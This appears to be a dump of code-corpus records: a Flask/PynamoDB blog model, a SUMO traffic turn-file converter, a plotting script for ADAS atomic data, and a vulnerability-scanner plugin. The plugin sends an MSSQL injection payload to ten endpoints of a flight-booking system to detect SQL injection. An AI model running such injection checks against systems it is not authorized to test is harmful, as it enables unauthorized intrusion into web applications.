"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "unittest.mock.MagicMock",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "randovania.games.common.prime_family.layout.lib.prime_trilogy_teleporters.PrimeTrilogyTeleporterConfiguration",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "dataclasses.replace",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType.MISC",
"line_number": 45,
"usage_type": "attribute"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType.MISC",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType.MISC",
"line_number": 47,
"usage_type": "attribute"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode",
"line_number": 67,
"usage_type": "name"
},
{
"api_name": "randovania.game_description.game_patches.GamePatches.create_from_game",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.game_patches.GamePatches",
"line_number": 68,
"usage_type": "name"
},
{
"api_name": "dataclasses.replace",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "randovania.generator.pickup_pool.pool_creator.calculate_pool_results",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "randovania.generator.pickup_pool.pool_creator",
"line_number": 71,
"usage_type": "name"
},
{
"api_name": "randovania.games.prime2.generator.bootstrap.EchoesBootstrap",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "random.Random",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "randovania.games.prime2.generator.pickup_pool.sky_temple_keys.SKY_TEMPLE_KEY_CATEGORY",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "randovania.games.prime2.generator.pickup_pool.sky_temple_keys",
"line_number": 82,
"usage_type": "name"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode.ALL_BOSSES",
"line_number": 86,
"usage_type": "attribute"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode",
"line_number": 86,
"usage_type": "name"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode.ALL_GUARDIANS",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode",
"line_number": 90,
"usage_type": "name"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode",
"line_number": 66,
"usage_type": "argument"
},
{
"api_name": "pytest.mark",
"line_number": 66,
"usage_type": "attribute"
}
] |
74725395066
|
from datetime import datetime
from pynamodb.models import Model
from pynamodb.attributes import UnicodeAttribute, NumberAttribute, UTCDateTimeAttribute
from flask_blog.lib.utils import is_production
import os
class Entry(Model):
class Meta:
table_name = "serverless_blog_entries"
region = 'ap-northeast-1'
        # settings for the production environment
if is_production():
aws_access_key_id = os.environ.get('SERVERLESS_AWS_ACCESS_KEY_ID')
aws_secret_access_key = os.environ.get('SERVERLESS_AWS_SECRET_KEY')
        # settings for the development environment
else:
aws_access_key_id = 'AWS_ACEESS_KEY_ID'
aws_secret_access_key = 'AWS_SECRET_ACCESS_KEY'
host = "http://localhost:8000"
    # column definitions
    id = NumberAttribute(hash_key=True, null=False)  # number
    title = UnicodeAttribute(null=True)  # string
    text = UnicodeAttribute(null=True)  # string
    created_at = UTCDateTimeAttribute(default=datetime.now)  # UTC-based datetime
|
uni51/serverless_python_tutorial
|
application/flask_blog/models/entries.py
|
entries.py
|
py
| 1,030 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pynamodb.models.Model",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "flask_blog.lib.utils.is_production",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "pynamodb.attributes.NumberAttribute",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "pynamodb.attributes.UnicodeAttribute",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "pynamodb.attributes.UnicodeAttribute",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pynamodb.attributes.UTCDateTimeAttribute",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime",
"line_number": 26,
"usage_type": "name"
}
] |
37430288968
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Piaoyou flight booking system - 10 SQL injection points
referer: http://www.wooyun.org/bugs/wooyun-2010-0118867
author: Lucifer
description: multiple SQL injection points.
'''
import sys
import requests
class piaoyou_ten_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
urls = ["/Other/train_input.aspx?memberid=1",
"/Other/hotel_input.aspx?memberid=1",
"/Other/input.aspx?memberid=1",
"/flight/Print_url_sel.aspx?id=2",
"/flight/Xcd_selected.aspx?id=111",
"/System/history.aspx?id=1",
"/flight/scgq.aspx?id=1",
"/Other/Edit.aspx?id=1",
"/flight/Html.aspx?id=1",
"/info/zclist_new.aspx?id=1"]
try:
for url in urls:
vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                    return "[+] Piaoyou booking system SQL injection found (10 injection points, high risk)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = piaoyou_ten_sqli_BaseVerify(sys.argv[1])
testVuln.run()
|
iceyhexman/onlinetools
|
scanner/plugins/cms/piaoyou/piaoyou_ten_sqli.py
|
piaoyou_ten_sqli.py
|
py
| 1,575 |
python
|
en
|
code
| 1,626 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 44,
"usage_type": "attribute"
}
] |
8385237281
|
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from argparse import ArgumentParser
if 'SUMO_HOME' in os.environ:
sys.path.append(os.path.join(os.environ['SUMO_HOME'], 'tools'))
import sumolib # noqa
def get_options(args=None):
parser = ArgumentParser(description="Sample routes to match counts")
parser.add_argument("-t", "--turn-file", dest="turnFile",
help="Input turn-count file")
parser.add_argument("-o", "--output-file", dest="out",
help="Output edgeRelations file")
parser.add_argument("--turn-attribute", dest="turnAttr", default="probability",
help="Write turning 'probability' to the given attribute")
options = parser.parse_args(args=args)
if options.turnFile is None or options.out is None:
parser.print_help()
sys.exit()
return options
def main(options):
with open(options.out, 'w') as outf:
sumolib.writeXMLHeader(outf, "$Id$", "data", "datamode_file.xsd") # noqa
for interval in sumolib.xml.parse(options.turnFile, 'interval'):
outf.write(' <interval begin="%s" end="%s">\n' % (
interval.begin, interval.end))
if interval.fromEdge:
for fromEdge in interval.fromEdge:
for toEdge in fromEdge.toEdge:
outf.write(' ' * 8 + '<edgeRelation from="%s" to="%s" %s="%s"/>\n' % (
fromEdge.id, toEdge.id, options.turnAttr, toEdge.probability))
outf.write(' </interval>\n')
outf.write('</edgeRelations>\n')
if __name__ == "__main__":
main(get_options())
|
ngctnnnn/DRL_Traffic-Signal-Control
|
sumo-rl/sumo/tools/turn-defs/turnFile2EdgeRelations.py
|
turnFile2EdgeRelations.py
|
py
| 1,716 |
python
|
en
|
code
| 17 |
github-code
|
6
|
[
{
"api_name": "os.environ",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "sumolib.writeXMLHeader",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "sumolib.xml.parse",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "sumolib.xml",
"line_number": 32,
"usage_type": "attribute"
}
] |
26824633032
|
import matplotlib.pyplot as plt
import scipy
import scipy.interpolate
import sys
sys.path.append('/home/faustian/python/adas/xxdata_13/')
from matplotlib import rc
import adasread
rc('text', usetex=True)
rc('font',**{'family':'serif','serif':['Computer Modern Roman']})
#rc('font',**{'family':'sans-serif','sans-serif':['Computer Modern Sans serif']})
rc('font',size=18)
# GRAB Lyalpha ONLY
def plot(filein,Telim,Nelim):
plt.figure()
out = adasread.xxdata_13(filein,1,Telim,Nelim)
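    # as used here, out[12] holds the Te grid, out[13] the ne grid and out[14] the
    # S/XB coefficients (ionizations per photon) returned by xxdata_13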
print(out[13])
print(out[12])
print(out[14])
ne = scipy.array(out[13]).ravel()
Te = scipy.array(out[12]).ravel()
SXB = scipy.array(out[14][:,:,0])
temp = ne != 0
temp2 = Te != 0
xout,yout = scipy.meshgrid(ne[temp]*1e6,Te[temp2])
zout = SXB[temp2,:]
zout = zout[:,temp]
plt.pcolor(xout,yout,zout)
plt.clim([.3,1.6])
plt.colorbar()
plt.xlabel(r'electron density [$10^{20} $m$^{-3}$]')
plt.ylabel(r'electron temperature [eV]')
#plt.title(filein+' colorbar is ionizations per photon')
def plot2(filein,Telim,Nelim,pts=101):
plt.figure()
out = adasread.xxdata_13(filein,1,Telim,Nelim)
print(out[13].shape)
print(out[12].shape)
print(out[14].shape)
ne = scipy.array(out[13]).ravel()
Te = scipy.array(out[12]).ravel()
SXB = scipy.array(out[14][:,:,0])
temp = ne != 0
temp2 = Te != 0
xout2,yout2 = scipy.meshgrid(ne[temp],Te[temp2])
SXB = SXB[temp2,:]
SXB = SXB[:,temp]
ne1 = scipy.linspace(ne[temp].min(),ne[temp].max(),pts)
Te1 = scipy.linspace(Te[temp2].min(),Te[temp2].max(),pts)
xout,yout = scipy.meshgrid(ne1,Te1)
interp = scipy.interpolate.RectBivariateSpline(scipy.log(ne[temp]),
Te[temp2],
SXB)
zout = interp.ev(scipy.log(xout),yout)
#xout,yout = scipy.meshgrid(ne[temp]*1e6,Te[temp2])
#zout = SXB[temp2,:]
#zout = zout[:,temp]
plt.pcolor(xout*1e6,yout,zout.T)
plt.colorbar()
plt.xlabel(r'electron density [$10^{20}$ m$^{-3}$]')
plt.ylabel(r'electron temperature [eV]')
#plt.title(filein+' colorbar is ionizations per photon')
def plot3(filein,Telim,Nelim,pts=11):
plt.figure()
out = adasread.xxdata_13(filein,1,Telim,Nelim)
print(out[13].shape)
print(out[12].shape)
print(out[14].shape)
ne = scipy.array(out[13]).ravel()
Te = scipy.array(out[12]).ravel()
SXB = scipy.array(out[14][:,:,0])
temp = ne != 0
temp2 = Te != 0
SXB = SXB[temp2,:]
SXB = SXB[:,temp]
xout2,yout2 = scipy.meshgrid(ne[temp],Te[temp2])
print(Te[temp2])
ne1 = scipy.linspace(ne[temp].min(),ne[temp].max(),pts)
Te1 = scipy.linspace(Te[temp2].min(),Te[temp2].max(),pts)
xout,yout = scipy.meshgrid(ne1,Te1)
zout = scipy.interpolate.griddata((scipy.log(xout2.flatten()),yout2.flatten()),SXB.flatten(),(scipy.log(xout),yout),'cubic')
#xout,yout = scipy.meshgrid(ne[temp]*1e6,Te[temp2])
#zout = SXB[temp2,:]
#zout = zout[:,temp]
plt.imshow(zout,cmap='viridis',extent=[ne1[0]*1e6,ne1[-1]*1e6,Te1[0],Te1[-1]],aspect='auto',origin='lower')
#plt.clim([.3,1.8])
colorz = plt.colorbar()
colorz.set_label(r'S/XB [ionizations per Ly$_\alpha$ photon]')
plt.xlabel(r'electron density [m$^{-3}$]')
plt.ylabel(r'electron temperature [eV]')
#plt.title(filein+' colorbar is ionizations per photon')
|
icfaust/Misc
|
analyzeSXB.py
|
analyzeSXB.py
|
py
| 3,468 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sys.path.append",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.rc",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "matplotlib.rc",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.rc",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "adasread.xxdata_13",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.pcolor",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.clim",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.colorbar",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 38,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 39,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "adasread.xxdata_13",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "scipy.linspace",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "scipy.linspace",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "scipy.interpolate.RectBivariateSpline",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "scipy.interpolate",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "scipy.log",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "scipy.log",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.pcolor",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 75,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.colorbar",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 76,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 77,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "adasread.xxdata_13",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "scipy.linspace",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "scipy.linspace",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "scipy.interpolate.griddata",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "scipy.interpolate",
"line_number": 105,
"usage_type": "attribute"
},
{
"api_name": "scipy.log",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.imshow",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 111,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.colorbar",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 114,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 116,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 117,
"usage_type": "name"
}
] |